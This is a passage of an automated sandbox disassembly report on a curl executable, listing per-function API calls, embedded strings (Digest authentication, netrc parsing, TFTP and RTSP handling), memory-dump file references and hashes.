Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

curl_msnprintf.CURL ref: 00423FB3
curl_msnprintf.CURL ref: 0042405D
curl_msnprintf.CURL ref: 004240BE
curl_msnprintf.CURL ref: 00424157
curl_msnprintf.CURL ref: 00424183

Strings

%4I64dM, xrefs: 00423FA3
%4I64dP, xrefs: 00423F6A
%5I64d, xrefs: 00424078
%2I64d.%0I64dM, xrefs: 00424032
%4I64dk, xrefs: 004240DB
%2I64d.%0I64dG, xrefs: 00424129
%4I64dT, xrefs: 004240AB
%4I64dG, xrefs: 00424170

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintf$curl_mvsnprintf
String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
API String ID: 405648482-2102732564
Opcode ID: 34ebac1ff5b1f0e879030c6911a2aa1654d19c0721e32c5574fe538a2f3f23fe
Instruction ID: 6f6137694b17222b96ecc30afe34de57017c8476bdfffe1859a88ddf5e49c0ea
Opcode Fuzzy Hash: 34ebac1ff5b1f0e879030c6911a2aa1654d19c0721e32c5574fe538a2f3f23fe
Instruction Fuzzy Hash: D05107B1A087109ED354AF1AE98431EBAE1EBC4318F55CA3FE49887345D37884888B47

Function 0042C190 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 295stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 0042C1FD
curl_easy_unescape.CURL ref: 0042C25A
curl_easy_unescape.CURL ref: 0042C2EF
strlen.MSVCRT ref: 0042C311
strlen.MSVCRT ref: 0042C32D
curl_strequal.CURL ref: 0042C399
strchr.MSVCRT ref: 0042C3B1
curl_easy_unescape.CURL ref: 0042C421
strlen.MSVCRT ref: 0042C4D4
curl_easy_unescape.CURL ref: 0042C4FF

Strings

Request has same path as previous transfer, xrefs: 0042C5D2
/, xrefs: 0042C3A6
no memory, xrefs: 0042C58B, 0042C65D
Uploading to a URL without a file name!, xrefs: 0042C633

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_easy_unescape$strlen$curl_strequalstrchrstrrchr
String ID: /$Request has same path as previous transfer$Uploading to a URL without a file name!$no memory
API String ID: 3253773208-3614780386
Opcode ID: c0be4af37db164bb1076dfd4bd6123a97d3284da22ce6979db336c8eb25f5b0a
Instruction ID: eed9db2ff2625a2e449c86655e43d728237622374208f6c767eb65832189d404
Opcode Fuzzy Hash: c0be4af37db164bb1076dfd4bd6123a97d3284da22ce6979db336c8eb25f5b0a
Instruction Fuzzy Hash: 24D107B06083118FC710EF65D49476EBBE0AF88348F45897EED888B356D738D945CB9A

Function 00402F60 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 206stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00402F83
memchr.MSVCRT ref: 004030F7

Strings

BPG, xrefs: 00403265
@PG, xrefs: 00402FFF
@PG, xrefs: 00402FE7
CQG, xrefs: 004030D5
@PG, xrefs: 00402FC6

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memchrstrlen
String ID: @PG$@PG$@PG$BPG$CQG
API String ID: 1715104208-206339
Opcode ID: 25fd9066a125ac346b387ec573b5847be23161b23bc67d7788a86d9b9160a1cb
Instruction ID: 1e23594beb3c7e4853c6be9530d13715a6779a2cbcb4acca289aee37f5fe6031
Opcode Fuzzy Hash: 25fd9066a125ac346b387ec573b5847be23161b23bc67d7788a86d9b9160a1cb
Instruction Fuzzy Hash: D281D6705087859AD7209F28C8483AABFE5AF45305F08C56EE8D85F3C2D37D9A49D78A

Function 004035F0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

curl_mfprintf.CURL ref: 00403648
curl_mfprintf.CURL ref: 00403674
curl_mfprintf.CURL ref: 00403695
curl_mfprintf.CURL ref: 004036B5
curl_mfprintf.CURL ref: 004036CC
curl_mfprintf.CURL ref: 00403736
curl_mfprintf.CURL ref: 0040375B
fopen.MSVCRT ref: 004037A8

Strings

Failed to open %s to write libcurl code!, xrefs: 004037BC
/********* Sample code generated by the curl command line tool **********, xrefs: 0040362B
%s, xrefs: 0040363D, 00403750
%s, xrefs: 00403665, 004036A6, 004036E4, 00403727

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mfprintf$fopen
String ID: %s$%s$/********* Sample code generated by the curl command line tool **********$Failed to open %s to write libcurl code!
API String ID: 2866519418-2431497813
Opcode ID: c7176f1142883b60ecd9433e986e465197712663925fd70c9785fada7c6f814b
Instruction ID: 9bb7adf3808cceeb1594ae2b02c6c83094156a9d144b47e9a5f7e05bf5788f0e
Opcode Fuzzy Hash: c7176f1142883b60ecd9433e986e465197712663925fd70c9785fada7c6f814b
Instruction Fuzzy Hash: E55154B1508304ABC720EF15D58025BBBE9FF80719F55C83EE9885F342E778D9849B89

Function 00434B1C Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 116stringCOMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 00434903
memchr.MSVCRT ref: 0043493D
strlen.MSVCRT ref: 0043496E
strlen.MSVCRT ref: 004349A8
strtol.MSVCRT ref: 004349DC
time.MSVCRT ref: 00434A58
strlen.MSVCRT ref: 00434B23
strtol.MSVCRT ref: 00434B57

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

Strings

%s (%ld), xrefs: 00434B64
blksize parsed from OACK, xrefs: 00434A33
requested, xrefs: 00434A2B
got option=(%s) value=(%s), xrefs: 00434995
tsize, xrefs: 00434B28
%s (%d) %s (%d), xrefs: 00434A3B
tsize parsed from OACK, xrefs: 00434B5C
blksize, xrefs: 004349AD

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$memchrstrtol$curl_mvsnprintftime
String ID: %s (%d) %s (%d)$%s (%ld)$blksize$blksize parsed from OACK$got option=(%s) value=(%s)$requested$tsize$tsize parsed from OACK
API String ID: 213514622-1023136374
Opcode ID: 1f723e765e3c3ebc1c2a477ac7b0c90c057a1909412de65ee4f0175932fb3db8
Instruction ID: 124c84455245efb9db2516994c1ce8154758ef2059107c65f1ef3ff0c114cb12
Opcode Fuzzy Hash: 1f723e765e3c3ebc1c2a477ac7b0c90c057a1909412de65ee4f0175932fb3db8
Instruction Fuzzy Hash: 2451E6B0A087119BC714AF25C5843AEFBF2AFC4344F15C96EE48897351E778E9858F4A

Function 0040BBA0 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 83stringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 0040BBBA
strrchr.MSVCRT ref: 0040BBD2
strrchr.MSVCRT ref: 0040BBF7
strrchr.MSVCRT ref: 0040BC0D
curl_easy_escape.CURL ref: 0040BC30
curl_maprintf.CURL ref: 0040BC4E
curl_free.CURL ref: 0040BC58
free.MSVCRT ref: 0040BC64
strrchr.MSVCRT ref: 0040BC7E

Strings

%s/%s, xrefs: 0040BCB0
\, xrefs: 0040BC73
://, xrefs: 0040BBAB
%s%s, xrefs: 0040BC47

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strrchr$curl_easy_escapecurl_freecurl_maprintffreestrstr
String ID: %s%s$%s/%s$://$\
API String ID: 2041394034-922806432
Opcode ID: 56d27b0e2a779bdd856ceec786cf222140b2815b1c5698bf3bfa2558829c0efb
Instruction ID: bd9cb491e277878c8f9abf9393bb32fc963f69625e56cb8c02e8d53d66fb677d
Opcode Fuzzy Hash: 56d27b0e2a779bdd856ceec786cf222140b2815b1c5698bf3bfa2558829c0efb
Instruction Fuzzy Hash: 5831527150C7019BE710BF25858462FBAE4EF85344F058C3EE9889B352EB7CD8859B9E

Function 0043D500 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 336COMMON

Download Yara Rule

APIs

isspace.MSVCRT ref: 0043D593

Strings

qop, xrefs: 0043D84F
opaque, xrefs: 0043D7F0
MD5, xrefs: 0043D9D4
nonce, xrefs: 0043D677
realm, xrefs: 0043D7A4
auth, xrefs: 0043D8DD, 0043D99B
algorithm, xrefs: 0043D911
auth-int, xrefs: 0043D8F1, 0043D992
MD5-sess, xrefs: 0043D945
stale, xrefs: 0043D738
Digest, xrefs: 0043D52D
true, xrefs: 0043D750

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: isspace
String ID: Digest$MD5$MD5-sess$algorithm$auth$auth-int$nonce$opaque$qop$realm$stale$true
API String ID: 3785662208-1655510627
Opcode ID: a6d2bedcb92dc38568143ac53272c30eec28a097658b6eb7a73a5086358b275c
Instruction ID: 111865ee51cce2e5be98df1fdf1553d51b3139f145010e850a25795aadd83753
Opcode Fuzzy Hash: a6d2bedcb92dc38568143ac53272c30eec28a097658b6eb7a73a5086358b275c
Instruction Fuzzy Hash: 81D15CB4E083418BD710DF25D48476BBBE0AF88348F05582EE8D88B351E779D985DB9A

Function 0043DF69 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 172COMMON

Download Yara Rule

APIs

curl_maprintf.CURL ref: 0043DD4C
curl_maprintf.CURL ref: 0043DE73
curl_maprintf.CURL ref: 0043DF83

Strings

d41d8cd98f00b204e9800998ecf8427e, xrefs: 0043DF70
%s, algorithm="%s", xrefs: 0043DEF1
Proxy-, xrefs: 0043DE1E
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=%08x, qop=%s, response="%s", xrefs: 0043DE60
%s:%s:%08x:%s:%s:%s, xrefs: 0043DD39
%s:%s, xrefs: 0043DF7C
auth, xrefs: 0043DE7E
%s, opaque="%s", xrefs: 0043DEBF

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintf
String ID: %s, algorithm="%s"$%s, opaque="%s"$%s:%s$%s:%s:%08x:%s:%s:%s$%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=%08x, qop=%s, response="%s"$Proxy-$auth$d41d8cd98f00b204e9800998ecf8427e
API String ID: 3307269620-856492121
Opcode ID: 9c8b712a519393a6a5ac568f3d1947bfeb38fa25663be8d894ce06d9e228b758
Instruction ID: c6ddbd7edc9b58c3416f992ca98158ec5038eaecb2104ff691f8200447ef0c31
Opcode Fuzzy Hash: 9c8b712a519393a6a5ac568f3d1947bfeb38fa25663be8d894ce06d9e228b758
Instruction Fuzzy Hash: 6E71D6B46083418FC720DF2AD48065BFBE0BF88745F15982EE9D987346E778E944CB56

Function 004130D0 Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 464stringCOMMON

Download Yara Rule

APIs

isalnum.MSVCRT ref: 0041313A
isalpha.MSVCRT ref: 00413155
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00422537), ref: 0041317E
strtol.MSVCRT ref: 004131AE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004131B5

Strings

%02d:%02d, xrefs: 0041340A
%02d:%02d:%02d, xrefs: 004133DF
Jan, xrefs: 0041331B
GMT, xrefs: 00413311
%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz], xrefs: 004132B0

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast$isalnumisalphastrtol
String ID: %02d:%02d$%02d:%02d:%02d$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$GMT$Jan
API String ID: 3852164772-2255947957
Opcode ID: 9692c6cc11667be0d0a7d673a1891c1c4641129c2fcc98a3d1d11b2516e8133c
Instruction ID: a3dcd50a181d1aa16e7e479591396260af7d5d9e42c5a2ee255d50f52414f079
Opcode Fuzzy Hash: 9692c6cc11667be0d0a7d673a1891c1c4641129c2fcc98a3d1d11b2516e8133c
Instruction Fuzzy Hash: 2F028571E003598FCB14CFA9C9442DDBBF2AF45325F14872AD465AB3D4D7389A86CB05

Function 00440120 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 190fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 0044015D
fgets.MSVCRT ref: 004401B7
fclose.MSVCRT ref: 00440367
curl_getenv.CURL(?), ref: 004403D6
curl_maprintf.CURL ref: 004403FC
fopen.MSVCRT ref: 0044041B

Strings

%s%s%s, xrefs: 004403F5
, xrefs: 004401D0, 00440224
password, xrefs: 00440384
login, xrefs: 00440307
HOME, xrefs: 004403CF
_netrc, xrefs: 004403E1
machine, xrefs: 00440296, 004403A6

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fopen$curl_getenvcurl_maprintffclosefgets
String ID: $%s%s%s$HOME$_netrc$login$machine$password
API String ID: 892591944-1454648440
Opcode ID: 5015e0ecbe5624e9918f57fdeb940b74242ee8c6165147584d65c6eccc56dd6e
Instruction ID: be942171142f815aef3bf7a502fda2d5c925df45c710908eb67076adefe665b0
Opcode Fuzzy Hash: 5015e0ecbe5624e9918f57fdeb940b74242ee8c6165147584d65c6eccc56dd6e
Instruction Fuzzy Hash: AD81F6705083418FE7109F65D58435FBBE0BF85308F40892EE9D887292E7B8C989DB9B

Function 0040E730 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 174stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040E748
malloc.MSVCRT ref: 0040E757
realloc.MSVCRT ref: 0040E7AC
memcpy.MSVCRT ref: 0040E7CC
strtoul.MSVCRT ref: 0040E810

Strings

%0*d, xrefs: 0040E909
internal error: invalid pattern type (%d), xrefs: 0040E89A

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: mallocmemcpyreallocstrlenstrtoul
String ID: %0*d$internal error: invalid pattern type (%d)
API String ID: 3995382834-1881276525
Opcode ID: 8ba729cf48db8ddcafda667aa81072d00c928f23974c64da1fc756396c8b2290
Instruction ID: 2a5ef0fef9afeaf2878b422d6281ab96f6c22221d684dfaf684ed24612bbd259
Opcode Fuzzy Hash: 8ba729cf48db8ddcafda667aa81072d00c928f23974c64da1fc756396c8b2290
Instruction Fuzzy Hash: 62613DB1A083018FD710DF26C48062ABBE1FF85344F198D7EE8989B392D739D955CB96

Function 0042E8BC Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 155COMMON

Download Yara Rule

APIs

sscanf.MSVCRT ref: 0042EC09
curl_msnprintf.CURL ref: 0042ECCF

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

Strings

Given file does not exist, xrefs: 0042E8DC
The requested document is not old enough, xrefs: 0042EF5A
%04d%02d%02d %02d:%02d:%02d GMT, xrefs: 0042F1B2
The requested document is not new enough, xrefs: 0042F29A
Skipping time comparison, xrefs: 0042EF35
unsupported MDTM reply format, xrefs: 0042EBA7
%04d%02d%02d%02d%02d%02d, xrefs: 0042EBFE
Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 0042EC5F

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintfcurl_mvsnprintfsscanfstrlen
String ID: %04d%02d%02d %02d:%02d:%02d GMT$%04d%02d%02d%02d%02d%02d$Given file does not exist$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT$Skipping time comparison$The requested document is not new enough$The requested document is not old enough$unsupported MDTM reply format
API String ID: 3593007870-226030088
Opcode ID: 1e76ae51f5bedef0fe71691adbbdef752ff3d664f0ffefc27b2527d429616c18
Instruction ID: e19be3086b7a58b6167c7d3d79d51ca638ae0a4b8899cf792ef83a8d797c89cf
Opcode Fuzzy Hash: 1e76ae51f5bedef0fe71691adbbdef752ff3d664f0ffefc27b2527d429616c18
Instruction Fuzzy Hash: C471C4B46083559FC724DF26D58065ABBE0FF88344F50892FE89987311E778EA48CF4A

Function 0043CBD0 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 154stringCOMMON

Download Yara Rule

APIs

sscanf.MSVCRT ref: 0043CC1B

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

isspace.MSVCRT ref: 0043CC94
strlen.MSVCRT ref: 0043CCAF
strncmp.MSVCRT ref: 0043CCBF

Strings

Session:, xrefs: 0043CC5C
Got a blank Session ID, xrefs: 0043CD13
CSeq:, xrefs: 0043CBF5
Unable to read the CSeq header: [%s], xrefs: 0043CC2D
: %ld, xrefs: 0043CC10
Got RTSP Session ID Line [%s], but wanted ID [%s], xrefs: 0043CCD8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$curl_mvsnprintfisspacesscanfstrncmp
String ID: : %ld$CSeq:$Got RTSP Session ID Line [%s], but wanted ID [%s]$Got a blank Session ID$Session:$Unable to read the CSeq header: [%s]
API String ID: 3376201712-1168109407
Opcode ID: d7bb0727c784b444670f8651550b0137c094002352c2e0eb81a84eec9f49f5a1
